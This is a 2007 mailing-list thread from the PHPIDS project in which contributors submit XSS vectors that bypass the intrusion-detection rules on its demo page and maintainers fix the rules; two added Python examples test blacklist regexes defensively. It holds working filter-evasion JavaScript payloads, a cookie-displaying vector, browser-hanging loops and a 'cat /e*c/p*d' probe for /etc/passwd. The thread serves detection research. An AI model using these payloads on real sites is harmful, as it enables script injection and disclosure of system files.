After talking to Christian and SirDarckCat I decided to make this post
- even if it may sound a little bit provocative ;) We spend lots of
time on the rules and, except for some details, we are pretty content
with them.
So if you like and find some time, give them a new try - anyone who
manages to create an XSS on the demo page will be mentioned in the
next release notes and will (if wanted) get a dedicated interview on
the blog (SirDarckCat's interview will appear in the next days - he was
again quicker than light with some vectors mentioned in the release
post).
Allowed are the following browsers:
- Firefox 1.5+
- IE 6+
- Opera 9+
- Safari 2+
- Konqueror 3.5+
Any vector which is able to create an alert/content change via JS
on the demo page counts - as long as a PoC of whatever form can be
provided. A similar contest will follow in the next weeks for SQL
Injection.
Greetings and have fun!
.mario
http://hackademix.net/2007/09/04/phpids-threesome/
Told you string concatenation was tough :)
On Aug 28, 8:40 pm, Mario Heiderich <Mario.Heider...@googlemail.com>
wrote:
URL=name
On Aug 28, 8:40 pm, Mario Heiderich <Mario.Heider...@googlemail.com>
wrote:
It should work because I tested it locally; however, it doesn't seem to
execute on your site. I've no idea why, maybe some characters are
causing the onclick handler to produce invalid data. The code above gets
past your filters though.
Tested this in Firefox locally and it worked:-
<a onclick="h1=''+'hr'+'';h2=''+'ef'+'';h3=h1+h2;s1=''+'jav'+'';s2=''+'ascri'+'';s3=''+'pt'+'';s4=''==''?':':0;s5=''+'aler'+'';s6=''+'t'+'';s7=''==''?'(1)':0;s8=s1+s2+s3+s4+s5+s6+s7;p1=previousSibling;p1.nextSibling[h3]=s8;" href="?test=test">Test</a>
On Aug 28, 8:40 pm, Mario Heiderich <Mario.Heider...@googlemail.com>
wrote:
I think I might have found 1 vector already
On Sep 7, 4:54 pm, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:
> Yep - very nice and strange one indeed! But fixed. The concatenation
> algorithm has received a recode - hope that will stop the next wave ;)
>
> Greetings and thanks!
> .mario
>
> 2007/9/6, Gareth <gazhe...@gmail.com>:
I sent you the questions, Gareth. Next would be Kishor and Giorgio if
you guys would like to.
On Sep 8, 2:58 pm, Mario Heiderich <Mario.Heider...@googlemail.com>
On Sep 9, 4:06 pm, thornmaker <thornma...@gmail.com> wrote:
> http://demo.php-ids.org/?test=%61%3D%31%21%3D%31%3F%30%3A%27%65%76%27...
I've written a simple script to conduct concatenation attacks, so if
anyone wants to improve it or add new vectors please do and send them
to the group.
The reason I think it is needed is because of the amount of possible
combinations, and having an automated tool like this would help with
unit testing of the code. You never know when a vector could creep
back in, you see.
Tool available here:-
www.businessinfo.co.uk/labs/phpids/phpids.php.zip
On Sep 10, 9:16 am, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:
> Wow - that's a nice one. I love the trick regex 1 preparing regex 2 for
> being in the right format to be executed.
>
> 2007/9/10, thornmaker <thornma...@gmail.com>:
>
> > here's another one using the "exec" function for regular expressions
> > to extract the strings to execute:
>
> >http://demo.php-ids.org/?test=%64%3D%27%27%2B%2F%65%76%61%6C%7E%6C%6F...
>
> > On Sep 9, 4:06 pm, thornmaker <thornma...@gmail.com> wrote:
> > >http://demo.php-ids.org/?test=%61%3D%31%21%3D%31%3F%30%3A%27%65%76%27...
>
> --
> _______________________
> php-ids.org
<script type="text/javascript">window.name=''</script>
Which the PHPIDS could include in the header of the page.
Mario: do you prefer these posted here or at sla.ckers or both?
On Sep 10, 4:16 am, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:
> Wow - that's a nice one. I love the trick regex 1 preparing regex 2 for
> being in the right format to be executed.
>
> 2007/9/10, thornmaker <thornma...@gmail.com>:
>
> > here's another one using the "exec" function for regular expressions
> > to extract the strings to execute:
>
> >http://demo.php-ids.org/?test=%64%3D%27%27%2B%2F%65%76%61%6C%7E%6C%6F...
>
> > On Sep 9, 4:06 pm, thornmaker <thornma...@gmail.com> wrote:
> > >http://demo.php-ids.org/?test=%61%3D%31%21%3D%31%3F%30%3A%27%65%76%27...
>
> --
> _______________________
> php-ids.org
A redirect to google.
If you enter this http://demo.php-ids.org?test=%63%6C%6F%73%65%28%29%3B
the site opens and immediately closes (close()).
The following two lock up the browser with 100% CPU activity.
http://demo.php-ids.org?test=%66%6F%72%28%69%3D%31%3B%69%3C%4E%75%6D%62%65%72%2E%4D%41%58%5F%56%41%4C%55%45%3B%2B%2B%69%29%7B%31%7D
http://demo.php-ids.org?test=%77%68%69%6C%65%28%31%29%7B%31%7D
This is an Opera-specific thing which you could use to spam up the
"error console" using an endless loop. opera.postError(1);
On 10 Sep., 16:03, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:
> Wow - I am impressed again ;) I'd prefer both variants of publishing if you
> don't mind. Great work, thornmaker!
>
> Greetings,
> .mario
>
> 2007/9/10, thornmaker <thornma...@gmail.com>:
>
> > so here's a similar one but eliminates the reg exp's... just pulls the
> > chars from the ''+/asdf/ directly.
>
> >http://demo.php-ids.org/?test=%78%3D%27%27%2B%2F%61%62%63%64%65%66%67...
Nice stuff - I didn't know about the opera specific JS - is there a
link to inform about that stuff?
Needless to say that the rules are *fixed* ;)
Thanks man!
.mario
On Sep 10, 11:49 pm, xorrer <obhvsbypqg...@gmail.com> wrote:
> A few of my findings.
>
> A redirect to google.
>
> http://demo.php-ids.org?test=%78%3D%27%27%2B%2F%68%77%74%2E%70%67%6F%...
>
> If you enter this http://demo.php-ids.org?test=%63%6C%6F%73%65%28%29%3B
> the site opens and immediately closes (close()).
>
> The following two lock up the browser with 100% CPU activity.
>
On Aug 28, 3:40 pm, Mario Heiderich <Mario.Heider...@googlemail.com>
wrote:
Muhahahahahaha
On Sep 10, 11:10 pm, Mario Heiderich <Mario.Heider...@googlemail.com>
wrote:
> Hi xorrer and welcome!
>
> Nice stuff - I didn't know about the opera specific JS - is there a
> link to inform about that stuff?
>
> Needless to say that the rules are *fixed* ;)
>
> Thanks man!
> .mario
>
> On Sep 10, 11:49 pm, xorrer <obhvsbypqg...@gmail.com> wrote:
>
> > A few of my findings.
>
> > A redirect to google.
>
> >http://demo.php-ids.org?test=%78%3D%27%27%2B%2F%68%77%74%2E%70%67%6F%...
>
> > If you enter this http://demo.php-ids.org?test=%63%6C%6F%73%65%28%29%3B
> > the site opens and immediately closes (close()).
>
> > The following two lock up the browser with 100% CPU activity.
>
> >http://demo.php-ids.org?test=%66%6F%72%28%69%3D%31%3B%69%3C%4E%75%6D%...
>
Well, the only real source I know of is here:
http://www.howtocreate.co.uk/operaStuff/operaObject.html.
And a file once included with earlier Opera versions, jsconsole.html
(http://people.opera.com/byberg/jsconsole.html,
http://www.scss.com.au/family/andrew/opera/panels/jsconsole/jsconsole.html)
xorrer
On 11 Sep., 00:10, Mario Heiderich <Mario.Heider...@googlemail.com>
wrote:
> Hi xorrer and welcome!
>
> Nice stuff - I didn't know about the opera specific JS - is there a
> link to inform about that stuff?
>
> Needless to say that the rules are *fixed* ;)
>
> Thanks man!
> .mario
>
> On Sep 10, 11:49 pm, xorrer <obhvsbypqg...@gmail.com> wrote:
>
> > A few of my findings.
>
> > A redirect to google.
>
> >http://demo.php-ids.org?test=%78%3D%27%27%2B%2F%68%77%74%2E%70%67%6F%...
>
> > If you enter this http://demo.php-ids.org?test=%63%6C%6F%73%65%28%29%3B
> > the site opens and immediately closes (close()).
>
> > The following two lock up the browser with 100% CPU activity.
>
> >http://demo.php-ids.org?test=%66%6F%72%28%69%3D%31%3B%69%3C%4E%75%6D%...
>
Dr Evil strikes again muwhahaahaha
I tried to create the smallest possible vector to see if it was
possible; this is dangerous because you can call functions or assign
functions using this technique. Combine it with string concatenation
and there's pretty much anything you can do.
On Sep 11, 12:33 pm, "Mario Heiderich"
<mario.heider...@googlemail.com> wrote:
> Thanks xorrer!
>
> @Gareth: This one is evil. damn!
>
> 2007/9/11, xorrer <obhvsbypqg...@gmail.com>:
>
> > On 11 Sep., 00:10, Mario Heiderich <Mario.Heider...@googlemail.com>
> > wrote:
> > > Nice stuff - I didn't know about the opera specific JS - is there a
> > > link to inform about that stuff?
>
> > Well the only real source I know of is here
> >http://www.howtocreate.co.uk/operaStuff/operaObject.html.
> > And a file once included with earlier opera versions jsconsole.html
> > (http://people.opera.com/byberg/jsconsole.html,
> >http://www.scss.com.au/family/andrew/opera/panels/jsconsole/jsconsole...
It's unbelievable that JavaScript allows variables to be called just
'_', don't you think? lol
I always say building things is a lot harder than breaking them ;)
On Sep 11, 12:59 pm, "Mario Heiderich"
<mario.heider...@googlemail.com> wrote:
> That's indeed DrEvilish - damn - this is working in dozens of
> combinations...
>
> _=alert, 'a',1;_(1);
>
> _=alert,
> 1,1;_(1);
>
> _=alert, 1,
> 1
> _(1);
>
> _=alert, 'a',1 , _ (1);
>
> Man - it's going to be really hard to find a pattern.
>
> 2007/9/11, Gareth <gazhe...@gmail.com>:
Also... I would like to test some of the path traversal injections but
am not sure what would be considered 'passing'. For example...
http://demo.php-ids.org/?test=1;cat%20/e*c/p*d will display /etc/passwd
in the right context, and you have filters that search for etc
and /etc/passwd outright, so I presume PHPIDS _should_ catch such
things...
On Sep 11, 9:53 pm, thornmaker <thornma...@gmail.com> wrote:
> I like how the error page shows the vector in an input box now... but
> could you make it a bit wider?
>
> Also... I would like to test some of the path traversal injections but
> am not sure what would be considered 'passing'. For example... http://demo.php-ids.org/?test=1;cat%20/e*c/p*d will display /etc/
On Sep 12, 9:43 am, thornmaker <thornma...@gmail.com> wrote:
> http://demo.php-ids.org/?test=%28%7A%3D%53%74%72%69%6E%67%29%26%26%28...
>
> On Sep 11, 9:53 pm, thornmaker <thornma...@gmail.com> wrote:
>
> > I like how the error page shows the vector in an input box now... but
> > could you make it a bit wider?
>
> > Also... I would like to test some of the path traversal injections but
> > am not sure what would be considered 'passing'. For example... http://demo.php-ids.org/?test=1;cat%20/e*c/p*d will display /etc/
see http://sla.ckers.org/forum/read.php?12,8085,15889,page=7#msg-15889
for an explanation.
On Sep 10, 10:03 am, "Mario Heiderich"
<mario.heider...@googlemail.com> wrote:
> Wow - I am impressed again ;) I'd prefer both variants of publishing if you
> don't mind. Great work, thornmaker!
>
> Greetings,
> .mario
>
> 2007/9/10, thornmaker <thornma...@gmail.com>:
>
> > so here's a similar one but eliminates the reg exp's... just pulls the
> > chars from the ''+/asdf/ directly.
>
> >http://demo.php-ids.org/?test=%78%3D%27%27%2B%2F%61%62%63%64%65%66%67...
On Sep 14, 4:39 am, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:
> This is plain awesome - already commented on that one on slackers. Thanks,
> thornmaker!!!
>
> 2007/9/14, thornmaker <thornma...@gmail.com>:
>
> >http://demo.php-ids.org/?test=%7B%7A%3D%28%31%3D%3D%34%29%3F%68%65%72...
>
> > see http://sla.ckers.org/forum/read.php?12,8085,15889,page=7#msg-15889
On Sep 14, 8:05 pm, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:
> Hehe - you managed to catch a 15 second window when i uploaded a faulty file
> ;)
>
> 2007/9/15, thornmaker <thornma...@gmail.com>:
Just some other stuff, again tested on Opera. Nothing special, just
something to mess up the page a little.
http://demo.php-ids.org/?test=%70%61%67%65%2E%72%65%6D%6F%76%65%4E%6F%64%65%28%74%72%75%65%29%3B
Btw. the last injections from thornmaker and kishord and the first of
mine above didn't execute on Opera, only in Firefox.
Xorrer
On Sep 15, 6:00 am, thornmaker <thornma...@gmail.com> wrote:
> a ternary operator based injection: http://demo.php-ids.org/?test=%61%3D%31%3D%3D%31%3F%31%3D%3D%31%2E%3F...
Xorrer
On Sep 15, 10:19 am, xorrer <obhvsbypqg...@gmail.com> wrote:
> Displays cookie and the string XSS (based on thornmakers and kishords
> work. thanks for the x='eval';n=0.[x] trick)
>
> http://demo.php-ids.org/?test=%5F%3D%31%3B%7B%7A%20%3D%28%5F%29%3F%22...
>
> Just some other stuff, again tested on Opera. Nothing special just
> something to mess up the page a little.
>
> http://demo.php-ids.org/?test=%5F%3D%31%3B%7B%7A%20%3D%28%5F%29%3F%22...
>
> http://demo.php-ids.org/?test=%70%61%67%65%2E%72%65%6D%6F%76%65%4E%6F...
On Sep 15, 12:15 pm, "Mario Heiderich"
<mario.heider...@googlemail.com> wrote:
> Nice one, xorrer! Your first ones i fixed on accident while working on
> thornmakers and kishors examples but the second one came unexpected ;) I did
> a slight modification on the converter to fix it. Thx!
>
> 2007/9/15, xorrer <obhvsbypqg...@gmail.com>:
>
> > Basic concept still works.
>
> >http://demo.php-ids.org/?test=%7B%7A%20%3D%28%31%29%3F%22%22%3A%61%7D...
Thanks. You can just list me up as xorrer, no webpage to link to.
On Sep 15, 3:34 pm, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:
> Well - I think i got it this time ;)
>
> @xorrer: I'd like to add you to the credits page - you want to be mentioned
> as xorrer or with your full name? You have a website you want to link your
> name to?
>
> 2007/9/15, xorrer <obhvsbypqg...@gmail.com>:
>
> > It's still possible
>
> >http://demo.php-ids.org/?test=%3B%7B%7A%20%3D%28%31%29%3F%22%22%3A%61...
On Sep 15, 6:10 pm, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:
> Argh - one second after the release ;)
>
> 2007/9/15, xorrer <obhvsbypqg...@gmail.com>:
>
> > oh... and btw it still works. and this time i took the time to clean
> > up the vector a little
>
> >http://demo.php-ids.org/?test=%7B%7A%20%3D%28%31%29%3F%22%22%3A%61%7D...
On Sep 15, 12:53 pm, "Mario Heiderich"
<mario.heider...@googlemail.com> wrote:
> Well - this issue seems to be way harder to solve than i originally thought.
>
> 2007/9/15, xorrer <obhvsbypqg...@gmail.com>:
>
> > Still works along the same lines
>
> >http://demo.php-ids.org/?test=%7B%7A%20%3D%28%31%29%3F%22%22%3A%61%7D...
> --
> _______________________
> php-ids.org
Those ternary ones are tough to prevent
I have a vector which fails by just one character. But I would like to
share it anyway.
If you remove the closing bracket, it passes the IDS, but then the
eval won't work.
And with my setup there is no way to escape this regex
_START_,.+=.+(\?|,).*\)_END_ or am I wrong?
On Sep 15, 9:00 pm, thornmaker <thornma...@gmail.com> wrote:
> nice work xorrer!
> here's another ternary one to add to the mix: http://demo.php-ids.org/?test=%7A%3D%2F%7A%2F%21%3D%2F%7A%2F%3F%27%27...
On Sep 15, 11:31 pm, xorrer <obhvsbypqg...@gmail.com> wrote:
> Good stuff thornmaker.
>
> Those ternary ones are tough to prevent
>
> I have a vector which fails by just one character. But I would like to
> share it anyway.
>
> http://demo.php-ids.org/?test=%61%3D%5B%27%27%2C%5D%3B%0D%0A%62%3D%5B...
On Sep 16, 2:44 am, xorrer <obhvsbypqg...@gmail.com> wrote:
> here are two other vectors.
>
> http://demo.php-ids.org/?test=%61%3D%2F%61%2F%21%3D%2F%61%2F%3F%27%27...
>
> http://demo.php-ids.org/?test=%61%3D%5B%27%5C%0D%0A%27%5D%3B%0D%0A%62...
<code>asd</code>
On Sep 16, 4:18 pm, Mario Heiderich <Mario.Heider...@googlemail.com>
Copy/Paste the vector from here http://phpfi.com/263258
On Sep 16, 4:18 pm, Mario Heiderich <Mario.Heider...@googlemail.com>
wrote:
That wasn't actually a vector, only a test if the <code> tag can be
used in postings. Man, this post was only up 2 seconds, how did you manage
to catch it?
> --
> _______________________
> php-ids.org
Those vectors are really great xorrer - many many thanks!
Martin
a = eval;a(test);
scores nothing and performs an eval on test...
a=eval;a(test);
(without the spaces) scores an impact of 5.
Might want to fix the rule so that spaces are included and raise the
same impact...
M
> http://demo.php-ids.org/?test=%61%3D%5B%27%5C%0D%0A%27%5D%3B%0D%0A%62 .
Btw:
function x () { alert(1) }; x();
Can't believe that isn't detected!
Have fun!
M
On Sep 16, 8:39 pm, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:
> Yep - rules were temporarily not at full strength, sry.
>
> in Hinks <mhi...@gmail.com>:
>
> > Damn - must have caught you between rule changes - knew it was too easy :p
>
> > M
>
> > On 9/16/07, Martin Hinks <mhi...@gmail.com> wrote:
> > > Ok... well, something to think about!
>
> > > Btw:
>
> > > function x () { alert(1) }; x();
>
> > > Can't believe that isn't detected!
>
> > > Have fun!
>
> > > M
>
> > > On 9/16/07, Mario Heiderich <mario.heider...@googlemail.com> wrote:
> > > > @Martin: Thanks - but I know. If I'd fix that we'd generate tons of
> > false
> > > > alerts. I've been struggling with the JS property rules for some time
> > (the
> > > > ones starting with (?:[^$\w\/-\s](?: ).
>
> > > > Maybe they will be removed soon but there's lots of testing needed
> > before...
>
> > > > 2007/9/16, Martin Hinks <mhi...@gmail.com>:
>
> > > > > Hey Mario, something I just noticed:
>
> > > > > a = eval;a(test);
>
> > > > > scores nothing and performs an eval on test...
>
> > > > > a=eval;a(test);
>
> > > > > (without the spaces) scores an impact of 5.
>
> > > > > Might want to fix the rule so that spaces are included and raise the
> > > > > same impact...
>
> > > > > M
>
> > > > > On 9/16/07, Mario Heiderich <mario.heider...@googlemail.com> wrote:
> > > > > > Yep - they are and they are furthermore really helpful to point
> > out bugs
> > > > in
> > > > > > the rules. The last examples used the fact that you can use $ as
> > label
> > > > in JS
> > > > > > (we had that earlier) which i plain forgot in several rules.
>
> > > > > > Awesome stuff!
>
> > > > > > 2007/9/16, Martin Hinks < mhi...@gmail.com>:
>
> > > > > > > Mario > *
>
> > > > > > > Those vectors are really great xorrer - many many thanks!
>
> > > > > > > Martin
>
> > > > > > > On 9/16/07, Mario Heiderich <mario.heider...@googlemail.com>
> > wrote:
> > > > > > > > Actually I'm a bot. *kidding*
> > > > > > > > No - just a coincidence :)
>
> > > > > > > > 2007/9/16, xorrer <obhvsbypqg...@gmail.com>:
> ...
b = (x());
$ = .0[b];a=$;
a( h() );
function x () { return 'eva' + p(); };
function p() { return 'l' ; };
function h() { return 'aler' + i(); };
function i() { return 't (123456)' ; };
Enjoy ;)
M
If we have functions such as eval, decodeURIComponent, replace or
String.fromCharCode, we can do pretty much what we want, I guess.
Anyway, nothing of this really has to do with intrusion detection. It's
just circumventing a blacklist filter and hoping that the browser
executes it.
I'll leave that for tomorrow.
- christ1an
On Sunday, 16 September 2007 at 21:56, you wrote:
(?:[":;,]\s*[)}\]]+)
finds closing JavaScript breaker including whitespace attacks
however they do not visually appear to match this rule. For
example...
a='';b
gets through fine, but
a='';b=
gets blocked by this rule... which just doesn't seem right.
perhaps I am too tired to be thinking clearly... I'll look again in
the morning.
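Martin's two observations above (a rule that scores `a=eval;a(test);` but not `a = eval;a(test);`, and the breaker rule `(?:[":;,]\s*[)}\]]+)` that does not visibly match either `a='';b` or `a='';b=`) and the percent-encoded demo URLs xorrer posted earlier in the thread share one lesson for anyone maintaining a blacklist: the rules only see what the decoding layer hands them, and a pattern that hard-codes one exact spelling of a vector misses its trivial respellings. The Python below is an added example written for this page, not PHPIDS code: the rule set and its impact values are constructed for illustration (only the breaker regex is quoted from the thread), and the decoding step reproduces what PHP's `$_GET` does before PHPIDS ever inspects the value.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Demo URLs exactly as posted in the thread (only the complete ones, not the
# ones the archive truncated with "...").
URL_CLOSE = "http://demo.php-ids.org?test=%63%6C%6F%73%65%28%29%3B"
URL_FOR = ("http://demo.php-ids.org?test=%66%6F%72%28%69%3D%31%3B%69%3C%4E%75%6D%62%65%72"
           "%2E%4D%41%58%5F%56%41%4C%55%45%3B%2B%2B%69%29%7B%31%7D")
URL_WHILE = "http://demo.php-ids.org?test=%77%68%69%6C%65%28%31%29%7B%31%7D"

# The PHPIDS rule Martin quotes, verbatim.
BREAKER = r'(?:[":;,]\s*[)}\]]+)'

# Constructed rule sets for illustration, not PHPIDS's default filter file.
# Each entry is (description, pattern, impact). The first rule exists in two
# spellings: one that insists on "name=eval" with no whitespace at all, and
# one that tolerates whitespace around the '='.
STRICT_RULES = [
    ("eval assigned to a variable, no whitespace", r"\w+=eval\b", 5),
    ("closing JavaScript breaker", BREAKER, 4),
    ("busy loop", r"\b(?:for|while)\s*\(.*\)\s*\{", 4),
    ("window close", r"\bclose\s*\(\s*\)", 3),
]
TOLERANT_RULES = [
    ("eval assigned to a variable, whitespace tolerated", r"\w+\s*=\s*eval\b", 5),
] + STRICT_RULES[1:]


def get_test_param(url):
    """Return the decoded ?test= value: the string PHP's $_GET['test'] would
    hold (percent-decoded, '+' turned into a space), which is the form an IDS
    running inside the application actually gets to inspect."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return query.get("test", [""])[0]


def score(payload, rules):
    """Apply every rule to the payload; return (total impact, hit descriptions)."""
    hits = [(desc, impact) for desc, pattern, impact in rules
            if re.search(pattern, payload)]
    return sum(impact for _, impact in hits), [desc for desc, _ in hits]


def breaker_fires(payload):
    """Does the quoted breaker rule match this payload at all?"""
    return re.search(BREAKER, payload) is not None


if __name__ == "__main__":
    # Matching the raw query string instead of the decoded parameter scores 0
    # on every vector: the letters of "while" never appear as letters there.
    for url in (URL_CLOSE, URL_FOR, URL_WHILE):
        raw = urlsplit(url).query.split("=", 1)[1]
        decoded = get_test_param(url)
        print(f"{decoded!r}: raw scores {score(raw, TOLERANT_RULES)[0]}, "
              f"decoded scores {score(decoded, TOLERANT_RULES)}")
    # Martin's pair: one space is enough to defeat the strict spelling.
    for vector in ("a = eval;a(test);", "a=eval;a(test);"):
        print(f"{vector!r}: strict {score(vector, STRICT_RULES)[0]}, "
              f"tolerant {score(vector, TOLERANT_RULES)[0]}")
    # The breaker rule needs a quote/colon/semicolon/comma followed by a
    # closing bracket, so neither of Martin's inputs triggers it; something
    # like '");}' does. Whatever blocked a='';b= was therefore another rule.
    for vector in ("a='';b", "a='';b=", '");}'):
        print(f"breaker rule on {vector!r}: {breaker_fires(vector)}")
```

Running it shows the decoded `close();`, `for(i=1;i<Number.MAX_VALUE;++i){1}` and `while(1){1}` each hitting one rule while their raw percent-encoded forms hit none, the strict eval rule scoring 5 for `a=eval;a(test);` and 0 for `a = eval;a(test);`, and the breaker regex matching neither of Martin's two strings. The practical takeaway is that every pattern in a rule file should be regression-tested against both spellings of each vector it claims to catch, after the same decoding the production code applies.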
Yep, that unicode stuff I stumbled upon yesterday with variable names
like 'ä', will cause some problems.
> Anyway, nothing of this really has to do with intrusion detection. It's
> just circumventing a blacklist filter and hoping that the browser
> executes it.
I don't really understand this statement. So you don't consider XSS
attacks to be something which PHPIDS should detect. Then what is an
IDS for a webapp supposed to find, if XSS doesn't fall into ID?
On Sep 17, 1:27 am, christ1an <ch0...@googlemail.com> wrote:
> Actually we can inject arbitrary js code at the moment since we can
> bake all js functions and every single char using this kind of vector:
>
> http://phpfi.com/263306
>
> If we have functions such as eval, decodeURIComponent, replace or
> String.fromCharCode, we can do pretty much what we want, I guess.
>
> Anyway, nothing of this really has to do with intrusion detection. It's
> just circumventing a blacklist filter and hoping that the browser
> executes it.
>
> I'll leave that for tomorrow.
>
> - christ1an
>
> On Sunday, 16 September 2007 at 21:56, you wrote:
>
> > Ok, got one for real now :p
> > b = (x());
> > $ = .0[b];a=$;
> > a( h() );
> > function x () { return 'eva' + p(); };
> > function p() { return 'l' ; };
> > function h() { return 'aler' + i(); };
> > function i() { return 't (123456)' ; };
> > Enjoy ;)
> > M
> > On 9/16/07, xorrer <obhvsbypqg...@gmail.com> wrote:
>
> >> Same stuff.
>
> >>http://demo.php-ids.org/?test=%C3%A4%3D%2F%C3%A4%2F%3F%27%27%3A+0%3Bb...
> ...
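Mario's remark in the Martin Hinks exchange above, that `$` is a legal JavaScript identifier character which he "plain forgot in several rules", together with the `_`-named vectors and xorrer's `ä` variable names, points at one recurring blind spot of regex blacklists: the character class a rule uses to mean "an identifier". The Python below is an added example for this page, not PHPIDS code. The two rules are constructed; the `underscore` vector is Mario's from the thread, the `umlaut` vector is the decoded form of xorrer's `¼script¾` URL posted later in the thread, and the `dollar` vector is constructed from Mario's remark. Python's `re.ASCII` flag stands in for a PCRE pattern compiled without the `u` modifier, where `\w` covers ASCII letters, digits and underscore only.

```python
import re

# Constructed rules (not PHPIDS's own) that try to catch "name = alert".
# \w is [A-Za-z0-9_]: it includes '_' but not '$', although both are legal
# JavaScript identifier characters.
WORD_RULE = r"\w+\s*=\s*alert\b"
IDENT_RULE = r"[\w$]+\s*=\s*alert\b"

VECTORS = {
    "underscore": "_=alert, 'a',1;_(1);",   # Mario's vector from the thread
    "dollar": "$=alert;$(1)",               # constructed from Mario's '$' remark
    "umlaut": "ä= alert, ä(1)",             # decoded form of xorrer's URL
}


def rule_fires(rule, payload, ascii_only=True):
    """Match one rule against one payload.

    ascii_only=True mirrors a PCRE rule without the /u modifier, where the
    word class is ASCII-only; False mirrors Unicode-aware matching, where a
    letter such as 'ä' counts as a word character."""
    flags = re.ASCII if ascii_only else 0
    return re.search(rule, payload, flags) is not None


def coverage(rule, ascii_only=True):
    """Report which of the sample vectors the rule catches."""
    return {name: rule_fires(rule, vector, ascii_only)
            for name, vector in VECTORS.items()}


if __name__ == "__main__":
    print("\\w only, ASCII:      ", coverage(WORD_RULE))
    print("[\\w$], ASCII:        ", coverage(IDENT_RULE))
    print("[\\w$], Unicode-aware:", coverage(IDENT_RULE, ascii_only=False))
```

The `\w`-only rule catches the `_` vector and misses the `$` one; adding `$` to the class fixes that but the `ä` vector still slips through until the pattern is matched Unicode-aware. A rule file that names identifiers should therefore spell out the class it means (`[\w$]` at minimum, plus the non-ASCII letters the engine is configured to treat as word characters) rather than relying on `\w`, and its test suite should carry one vector per identifier flavour so a forgotten class is caught before release.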
I think this thread is very important both for the PHPIDS and for
the readers. Personally speaking, I haven't learned that much about XSS
and JS in general in a very long time. Starting with the XML
predicates, Unicode labels, the weirdest concatenations, anonymous
methods put together in ways one would never expect them to execute
and so on. (We should assemble a paper about that!!!)
The filter rules before starting this thread had a size of 26372 bytes
and detected none of the listed vectors - now they have a size of 24259
bytes and are able to detect any of the listed ones. Sure - after this
storm has slowed down there will be much work to fix false positives -
in fact I fixed several yesterday evening - but that is plainly
the evolution the PHPIDS has to go through.
In my eyes any new submission is greatly appreciated and very much
helps the system in getting better. What do you think?
> ...
Martin
On Sep 17, 10:10 am, "Mario Heiderich"
<mario.heider...@googlemail.com> wrote:
> 100% agreement with martin!
>
> Ah and btw: I added a new feature to the converter - small but maybe with
> strange results - so please excuse if the demo rules _might_ act a little
> bit weird. I am still testing... :)
>
> 2007/9/17, Martin Hinks <mhi...@gmail.com>:
>
> > This process is absolutely crucial for the IDS! It is only through the
> > expert knowledge and time donated of people who really know what they
> > are doing when it comes to attacks that the blacklist-system can ever
> > be effective. Sure, there will always be new vectors, but this process
> > is the core of PHPIDS. Without excellent filter rules it's just a
> > glorified regex matching engine.
>
> > Martin
>
> ...
Thanks xorrer!
M
On Sep 17, 10:57 am, "Martin Hinks" <mhi...@gmail.com> wrote:
> Awesome use of the XML predicates!
>
> Thanks xorrer!
>
> M
>
> On 9/17/07, xorrer <obhvsbypqg...@gmail.com> wrote:
>
> > I worked out this http://groups.google.com/group/php-ids/msg/f1706c3ff2eeaf98
> > idea from Gareth.
>
> >http://demo.php-ids.org/?test=s1%3D%3Cs%3Eevalalerta%281%29a%3C%2Fs%3...
> ...
Btw. I found this one
http://demo.php-ids.org/?test=%C2%BCscript%C2%BE+%C3%A4%3D+alert%2C+%C3%A4%281%29+%C2%BC%2Fscript%C2%BE.
But I don't really know if it would work if the circumstances were
right (the US-ASCII problem, found by Kurt Huwig).
And there seems to be a problem with the acute accent "´". After
sending just that character, the answer says
[codesnippet]<h3>found injection: ´</h3>[/codesnippet]
> 2007/9/17, xorrer <obhvsbypqg...@gmail.com>:
> ...
But the second one wasn't about detecting the acute accent, which is
correct, but about the answer from PHPIDS, which includes ´.
Where does this  come from?
That's what I meant.
On Sep 17, 5:27 pm, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:
> Hi xorrer!
>
> We once had a rule for that one but to be honest I didn't ever manage to get
> this one running. So i think this is ignorable. What do you think?
>
> The accent/backtick is being detected when coming alone as SQL injection
> because it's a _very_ common pattern to just inject a quoting char. So I
> decided to add this pattern to the rules - It shouldn't create many false
> positives so I think we should keep it in.
>
> Greetings,
> .mario
>
> 2007/9/17, xorrer <obhvsbypqg...@gmail.com>:
>
> > Ok christ1an, now I understand what you meant. And I agree that the
> > PHPIDS probably already detects most of the attacks that matter for
> > real world applications.
>
> > Btw. I found this one
>
> >http://demo.php-ids.org/?test=%C2%BCscript%C2%BE+%C3%A4%3D+alert%2C+%...
> ...
Here is an attribute-breaking injection, which also heavily messes up the
page for fun.
On Sep 17, 5:41 pm, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:
> Ah now I get it. That should be some encoding issue on certain OS. The output
> is validated several times so some special chars may produce weird output
> like
> found injection: ´
> This is a demo-only issue and has nothing to do with the
> PHPIDS. Btw - above is my output on Ubuntu 7.1 - on the WinXP VMs it looks
> completely different.
>
> Grx,
> .mario
>
> 2007/9/17, xorrer <obhvsbypqg...@gmail.com>:
> ...
Nevertheless here's the copy of what I posted on slackers recently to
make some things more clear:
<copy&paste>
I'm a bit frightened by the suddenly changed atmosphere. To avoid
misunderstanding and to express my absolutely personal opinion, here's
my 2 cents (as initial founder and maintainer of the rules):
- I love waking up in the morning and seeing new injection vectors
after checking my mails - the weirder the better
- I love fixing them ASAP - some fixes are better - some worse - but
all in all it so much helps to increase the quality of the product
that is called PHPIDS. The fast release cycles make the PHPIDS better
than the commercial solutions because we can react to new exploit
vectors in half an hour.
- The maybe stupid-sounding slogan 'Web Application Security 2.0' is
more than a slogan - it's what the project is all about - it's the
knowledge of an unlimited amount of people brought together in one
open tool. We didn't choose the LGPL at random but on purpose. Need the
rules to improve your project? Take em!
- And last but not least - the project will never be perfect and there
will always be an attack surface. But we are altogether working on
making that attack surface smaller and smaller every
day.
Please continue submitting your vectors and helping us out - I try to
give credit as much as my time allows and I hope you are
cool with that. If not, just drop us a line. Any input
whatsoever is very much appreciated and w/o your help the project
would be nothing.
Thanks for all of your recent work - please give us more reasons to
dream of weird javascript madness (the sqli contest is already
